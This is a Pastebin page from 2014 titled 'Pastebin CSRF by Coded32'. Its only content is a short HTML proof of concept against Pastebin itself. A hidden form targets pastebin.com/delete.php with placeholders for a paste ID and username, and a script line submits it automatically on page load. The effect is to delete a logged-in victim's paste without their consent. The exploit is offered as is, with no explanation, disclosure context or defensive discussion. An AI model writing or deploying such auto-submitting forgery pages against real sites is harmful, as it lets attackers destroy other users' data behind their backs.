Tophat

Pastebin CSRF by Coded32

Mar 9th, 2014
410
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. <form id='csrf' action='http://pastebin.com/delete.php' method='get'>
  2. <input type='hidden' name='i' value='PASTEID' />
  3. <input type='hidden' name='r' value='/u/USERNAME' />
  4. </form>
  5.  
  6. <script>document.getElementById('csrf').submit();</script>
Advertisement
Add Comment
Please, Sign In to add comment